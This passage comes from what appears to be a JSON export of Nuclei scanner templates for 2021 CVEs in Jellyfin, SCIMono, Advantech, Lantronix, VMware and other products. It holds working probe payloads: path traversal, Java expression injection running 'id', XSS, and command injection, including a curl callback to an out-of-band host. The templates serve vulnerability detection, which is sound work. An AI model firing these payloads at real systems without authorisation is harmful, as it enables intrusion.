cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: jellyfin\n product: jellyfin\n shodan-query: http.html:\"Jellyfin\"\n fofa-query: title=\"Jellyfin\" || body=\"http://jellyfin.media\"\n tags: cve,cve2021,jellyfin,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/\"\n - \"{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"Content-Type: application/octet-stream\"\n\n - type: regex\n part: body\n regex:\n - \"\\\\[(font|extension|file)s\\\\]\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210099094cb8ddabbb62ae1c1a3278524ca37c02baabbb89430ec56c39a6591a9f9a02201e01bb5340f1cec11d2ba496fd3b176816decd82aa4f21cff997ada5c09963fb:922c64590222798bb761d5b6d8e72950", "hash": "05bb423a18a36913e36d6c713ad412de", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308275" }, "name": "CVE-2021-21479.yaml", "content": "id: CVE-2021-21479\n\ninfo:\n name: SCIMono <0.0.19 - Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: |\n SCIMono before 0.0.19 is vulnerable to remote code execution because it is possible for an attacker to inject and\n execute java expressions and compromise the availability and integrity of the system.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: |\n Upgrade SCIMono to version 0.0.19 or later to mitigate this vulnerability.\n reference:\n - https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21479\n - https://github.com/SAP/scimono/security/advisories/GHSA-29q4-gxjq-rx5c\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H\n cvss-score: 9.1\n cve-id: CVE-2021-21479\n cwe-id: CWE-74\n epss-score: 0.00396\n epss-percentile: 0.70798\n cpe: cpe:2.3:a:sap:scimono:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sap\n product: scimono\n tags: cve,cve2021,scimono,rce,sap\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\\\"id\\\")')%7D\"\n\n matchers:\n - type: word\n part: body\n words:\n - \"The attribute value\"\n - \"java.lang.UNIXProcess@\"\n - \"has invalid value!\"\n - '\"status\" : \"400\"'\n condition: and\n# digest: 4a0a004730450220492f92e5a086f61cde1c3cb1bce6d47be6f9bb9fe6a79dcb1e8390046a6e324b02210093a84217824268630dc66e229a860a26df1630c1e07d49c591a7b174768313a3:922c64590222798bb761d5b6d8e72950", "hash": "0b124298af0e613c516ffa9a1e97fc06", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308276" }, "name": "CVE-2021-21745.yaml", "content": "id: CVE-2021-21745\n\ninfo:\n name: ZTE MF971R - Referer authentication bypass\n author: gy741\n severity: medium\n description: |\n ZTE MF971R product has a Referer authentication bypass vulnerability. Without CSRF verification, an attackercould\n use this vulnerability to perform illegal authorization operations by sending a request to the user to click.\n impact: |\n An attacker can bypass authentication and gain unauthorized access to the router.\n remediation: |\n Apply the latest firmware update provided by ZTE to fix the authentication bypass vulnerability.\n reference:\n - https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1317\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21745\n - https://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1019764\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N\n cvss-score: 4.3\n cve-id: CVE-2021-21745\n cwe-id: CWE-352\n epss-score: 0.26168\n epss-percentile: 0.96622\n cpe: cpe:2.3:o:zte:mf971r_firmware:v1.0.0b05:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zte\n product: mf971r_firmware\n tags: cve2021,cve,zte,auth-bypass,router\n\nhttp:\n - raw:\n - |\n GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1\n Host: {{Hostname}}\n Referer: http://interact.sh/127.0.0.1.html\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - 'psw_fail_num_str\":\"[0-9]'\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221009e6426cc572101b45641c767c7e539db75a145714644272d3d163df59b5ea2aa022015d94f5ac290e8fb85ec786f4e590bdf9fe9fbd03a04357cc7dfa9cffa27e110:922c64590222798bb761d5b6d8e72950", "hash": "0af8c2d551f9639f6e6cd89ac75e4ba2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308277" }, "name": "CVE-2021-21799.yaml", "content": "id: CVE-2021-21799\n\ninfo:\n name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the telnet_form.php script functionality.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Advantech to mitigate the XSS vulnerability in R-SeeNet 2.4.12.\n reference:\n - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21799\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-21799\n cwe-id: CWE-79\n epss-score: 0.83144\n epss-percentile: 0.98156\n cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: advantech\n product: r-seenet\n shodan-query: http.html:\"R-SeeNet\"\n tags: cve2021,cve,xss,r-seenet,advantech\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Telnet \"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100cf3f445ac2523e140ae589eedb4c723a9d60a1d3734ddf47f76c27ceebc054d4022100907ae703851cd94586106cb70d472adad6e98a3ec9113a16e806545245aaf46b:922c64590222798bb761d5b6d8e72950", "hash": "5b156de1b104ccb8c89591803ac0535f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308278" }, "name": "CVE-2021-21800.yaml", "content": "id: CVE-2021-21800\n\ninfo:\n name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the ssh_form.php script functionality.\n remediation: |\n Apply the latest security patches or updates provided by Advantech to fix the XSS vulnerability in R-SeeNet 2.4.12.\n reference:\n - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1271\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21800\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Live-Hack-CVE/CVE-2021-21800\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-21800\n cwe-id: CWE-79\n epss-score: 0.80604\n epss-percentile: 0.98232\n cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: advantech\n product: r-seenet\n shodan-query: http.html:\"R-SeeNet\"\n tags: cve2021,cve,xss,r-seenet,advantech\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"SSH Session \"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206e315588ca65297173b6814bc6172397458309ebd730542d6d0aed165442ab5d022054bd3fded5b447cdb4d288ef12338c62319a42e3576f5cb78f32945ed424f4dc:922c64590222798bb761d5b6d8e72950", "hash": "2001733e3dfff9adced5b2c03e2cfd0e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308279" }, "name": "CVE-2021-21801.yaml", "content": "id: CVE-2021-21801\n\ninfo:\n name: Advantech R-SeeNet - Cross-Site Scripting\n author: gy741\n severity: medium\n description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the graph parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Advantech to fix the XSS vulnerability in the R-SeeNet application.\n reference:\n - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21801\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-21801\n cwe-id: CWE-79\n epss-score: 0.83144\n epss-percentile: 0.98185\n cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: advantech\n product: r-seenet\n tags: cve2021,cve,rseenet,xss,graph,advantech\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"zlo onerror=alert(1) \"'\n - 'Device Status Graph'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022028dd003a44a9702befd4cdafccf356aabf08e207ef3c8c0e5eb1d535064326b402205d4243a377e793952264578149afc3cdc9910c0e9726edeb5c3bcb82fcddd527:922c64590222798bb761d5b6d8e72950", "hash": "41ed7876430e81a1a6e666edb1a31287", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30827a" }, "name": "CVE-2021-21802.yaml", "content": "id: CVE-2021-21802\n\ninfo:\n name: Advantech R-SeeNet - Cross-Site Scripting\n author: gy741\n severity: medium\n description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the device_id parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Advantech to fix the XSS vulnerability in the R-SeeNet application.\n reference:\n - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21801\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-21802\n cwe-id: CWE-79\n epss-score: 0.80604\n epss-percentile: 0.98232\n cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: advantech\n product: r-seenet\n tags: cve2021,cve,rseenet,xss,advantech\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"zlo onerror=alert(1) \"'\n - 'Device Status Graph'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b65c1a7c0caee4cc49ce03a121778de8d65d17b11bb2394279d0fca029d611eb022100f2ce7dd5d0ac03d233b2fbb513a64ce3e55f76c813b11c6c83f7db84c7397774:922c64590222798bb761d5b6d8e72950", "hash": "7c7b8ca3de723274fc8378eb65aa5b94", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30827b" }, "name": "CVE-2021-21803.yaml", "content": "id: CVE-2021-21803\n\ninfo:\n name: Advantech R-SeeNet - Cross-Site Scripting\n author: gy741\n severity: medium\n description: Advantech R-SeeNet is vulnerable to cross-site scripting via the device_graph_page.php script via the is2sim parameter. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Advantech to mitigate this vulnerability.\n reference:\n - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21803\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-21803\n cwe-id: CWE-79\n epss-score: 0.80604\n epss-percentile: 0.98232\n cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: advantech\n product: r-seenet\n tags: cve2021,cve,rseenet,xss,advantech\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"zlo onerror=alert(1) \"'\n - 'Device Status Graph'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220290c465e8ffed921fc075e33c05d61e6ad6c8dc976ad0768a3c67c27cf6c886d022015809e3ad84f8ad4271e11246380311837a9a3a71febd990084cb12f5a2a7961:922c64590222798bb761d5b6d8e72950", "hash": "c2092cfdf9824519196916587ea5dcdb", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30827c" }, "name": "CVE-2021-21805.yaml", "content": "id: CVE-2021-21805\n\ninfo:\n name: Advantech R-SeeNet 2.4.12 - OS Command Injection\n author: arafatansari\n severity: critical\n description: |\n Advantech R-SeeNet 2.4.12 is susceptible to remote OS command execution via the ping.php script functionality. An attacker, via a specially crafted HTTP request, can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.\n remediation: |\n Update to the latest version of Advantech R-SeeNet to mitigate this vulnerability.\n reference:\n - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21805\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-21805\n cwe-id: CWE-78\n epss-score: 0.97374\n epss-percentile: 0.99895\n cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: advantech\n product: r-seenet\n shodan-query: http.html:\"R-SeeNet\"\n tags: cve2021,cve,rce,r-seenet,advantech\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/php/ping.php?hostname=|dir\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Ping |dir\"\n - \"bottom.php\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220239da739e577f078def3474254759fb447a0e1c7ae5e5c894fc15f3748b3752b022039afb1da09e145478b68a7981ab742ece2729a5f473a12d97e7c259b4bddafb6:922c64590222798bb761d5b6d8e72950", "hash": "75614bf6ae9a65deffa9a671ac75aa4c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30827d" }, "name": "CVE-2021-21816.yaml", "content": "id: CVE-2021-21816\n\ninfo:\n name: D-Link DIR-3040 1.13B03 - Information Disclosure\n author: gy741\n severity: medium\n description: D-Link DIR-3040 1.13B03 is susceptible to information disclosure in the Syslog functionality. A specially crafted HTTP network request can lead to the disclosure of sensitive information. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the router, potentially leading to further attacks.\n remediation: |\n Upgrade the router firmware to the latest version provided by D-Link.\n reference:\n - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21816\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N\n cvss-score: 4.3\n cve-id: CVE-2021-21816\n cwe-id: CWE-200\n epss-score: 0.00229\n epss-percentile: 0.60334\n cpe: cpe:2.3:o:dlink:dir-3040_firmware:1.13b03:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dlink\n product: dir-3040_firmware\n tags: cve2021,cve,dlink,exposure,router,syslog\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/messages\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"syslog:\"\n - \"admin\"\n - \"/etc_ro/lighttpd/www\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205524508cec5a7648f3525efc7cc61e2269f85a2218a048a07c6d27965360ef0b022100cffbf244af2a53310124e9534e57a43bad9b0e544ee49ab2bfdcca089ad71ce8:922c64590222798bb761d5b6d8e72950", "hash": "9737ec9dc5ccd9b1c6a9e80e2505fce6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30827e" }, "name": "CVE-2021-21881.yaml", "content": "id: CVE-2021-21881\n\ninfo:\n name: Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection\n author: gy741\n severity: critical\n description: Lantronix PremierWave 2050 8.9.0.0R4 contains an OS command injection vulnerability. A specially-crafted HTTP request can lead to command in the Web Manager Wireless Network Scanner. An attacker can make an authenticated HTTP request to trigger this vulnerability.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or complete compromise of the affected device.\n remediation: |\n Apply the latest firmware update provided by Lantronix to mitigate the vulnerability.\n reference:\n - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1325\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21881\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 9.9\n cve-id: CVE-2021-21881\n cwe-id: CWE-78\n epss-score: 0.97001\n epss-percentile: 0.99723\n cpe: cpe:2.3:o:lantronix:premierwave_2050_firmware:8.9.0.0:r4:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: lantronix\n product: premierwave_2050_firmware\n tags: cve2021,cve,lantronix,rce,oast,cisco\nvariables:\n useragent: '{{rand_base(6)}}'\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Authorization: Basic dXNlcjp1c2Vy\n Content-Type: application/x-www-form-urlencoded\n\n ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Authorization: Basic YWRtaW46UEFTUw==\n Content-Type: application/x-www-form-urlencoded\n\n ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: {{useragent}}\"\n# digest: 490a004630440220787afb24b4404fe795e842e2aaecd864176f0b281a8a029cc7f051d784b99d95022063b2263ccd44743fed77f74ab9037062e981c2179c736dd603756ff4753b1f46:922c64590222798bb761d5b6d8e72950", "hash": "38b4350a73f5564fccfc0a9df29b02d0", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30827f" }, "name": "CVE-2021-21972.yaml", "content": "id: CVE-2021-21972\n\ninfo:\n name: VMware vSphere Client (HTML5) - Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: VMware vCenter vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability.\n reference:\n - https://swarm.ptsecurity.com/unauth-rce-vmware/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21972\n - https://www.vmware.com/security/advisories/VMSA-2021-0002.html\n - http://packetstormsecurity.com/files/161590/VMware-vCenter-Server-7.0-Arbitrary-File-Upload.html\n - https://github.com/NS-Sp4ce/CVE-2021-21972\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-21972\n cwe-id: CWE-22\n epss-score: 0.97299\n epss-percentile: 0.99858\n cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n product: cloud_foundation\n tags: cve2021,cve,vmware,rce,vcenter,kev,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ui/vropspluginui/rest/services/getstatus\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"VSPHERE-UI-JSESSIONID\"\n condition: and\n\n - type: regex\n part: body\n regex:\n - \"(Install|Config) Final Progress\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221008a71fb56cbbb561d1194e28bd9f8f4a0ca7d026f85ac836e16e922235866c4db0220094b2f806b8a6ddfe8ec4c90b89c3d4b478f62b58ddd6e652f8bfca2c3c211e9:922c64590222798bb761d5b6d8e72950", "hash": "6c747af002a7b09bc4a15a8a72de7a53", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308280" }, "name": "CVE-2021-21973.yaml", "content": "id: CVE-2021-21973\n\ninfo:\n name: VMware vSphere - Server-Side Request Forgery\n author: pdteam\n severity: medium\n description: VMware vSphere (HTML5) is susceptible to server-side request forgery due to improper validation of URLs in a vCenter Server plugin. An attacker with network access to port 443 can exploit this issue by sending a POST request to the plugin. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l, and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access, data leakage, or further attacks.\n remediation: |\n Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability.\n reference:\n - https://twitter.com/osama_hroot/status/1365586206982082560\n - https://twitter.com/bytehx343/status/1486582542807420928\n - https://www.vmware.com/security/advisories/VMSA-2021-0002.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21973\n - https://github.com/soosmile/POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-21973\n cwe-id: CWE-918\n epss-score: 0.15857\n epss-percentile: 0.95819\n cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n product: cloud_foundation\n tags: cve2021,cve,vmware,ssrf,vcenter,oast,kev\n\nhttp:\n - raw:\n - |\n GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1\n Host: {{Hostname}}\n Vcip: {{interactsh-url}}\n Vcpassword: {{rand_base(6)}}\n Vcusername: {{rand_base(6)}}\n Reqresource: {{rand_base(6)}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"The server sent HTTP status code 200\"\n\n - type: status\n status:\n - 500\n# digest: 4b0a00483046022100ae2879749b829379356f96d31e87b9cf69c38a5cfaa4b2d70b07eb82ec9956a00221009d3d4e7ffba84fe659bf8dd0e6d42388727c2eef535df5f9b7f7f563595a54a9:922c64590222798bb761d5b6d8e72950", "hash": "99a7c2a91a4c2523608809b3dc52058a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308281" }, "name": "CVE-2021-21975.yaml", "content": "id: CVE-2021-21975\n\ninfo:\n name: vRealize Operations Manager API - Server-Side Request Forgery\n author: luci\n severity: high\n description: vRealize Operations Manager API is susceptible to server-side request forgery. A malicious actor with network access to the vRealize Operations Manager API can steal administrative credentials or trigger remote code execution using CVE-2021-21983.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access, data leakage, or further attacks.\n remediation: |\n Apply the necessary security patches or updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://www.vmware.com/security/advisories/VMSA-2021-0004.html\n - http://packetstormsecurity.com/files/162349/VMware-vRealize-Operations-Manager-Server-Side-Request-Forgery-Code-Execution.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21975\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-21975\n cwe-id: CWE-918\n epss-score: 0.96694\n epss-percentile: 0.99569\n cpe: cpe:2.3:a:vmware:cloud_foundation:3.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n product: cloud_foundation\n tags: cve2021,cve,kev,packetstorm,ssrf,vmware,vrealize\n\nhttp:\n - raw:\n - |\n POST /casa/nodes/thumbprints HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json;charset=UTF-8\n\n [\"127.0.0.1:443/ui/\"]\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'vRealize Operations Manager'\n - 'thumbprint'\n - 'address'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100dbd882e8580bb92aba980917dec07a0ecad6b313017de33899a7bdf2d8ef04840220568bc3c9912731ec942471e6c36606a29575dd3c9687cb0df9e10c2b82f6a1b9:922c64590222798bb761d5b6d8e72950", "hash": "da9b235600cc4d498cd4f147d93b0f68", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308282" }, "name": "CVE-2021-21978.yaml", "content": "id: CVE-2021-21978\n\ninfo:\n name: VMware View Planner <4.6 SP1- Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: |\n VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability due to improper input validation and lack of authorization leading to arbitrary file upload in logupload web application.\n An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted\n file leading to remote code execution within the logupload container.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade to VMware View Planner version 4.6 SP1 or later to mitigate this vulnerability.\n reference:\n - https://twitter.com/osama_hroot/status/1367258907601698816\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21978\n - https://www.vmware.com/security/advisories/VMSA-2021-0003.html\n - http://packetstormsecurity.com/files/161879/VMware-View-Planner-4.6-Remote-Code-Execution.html\n - https://github.com/HimmelAward/Goby_POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-21978\n cwe-id: CWE-20\n epss-score: 0.97469\n epss-percentile: 0.99959\n cpe: cpe:2.3:a:vmware:view_planner:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n product: view_planner\n tags: 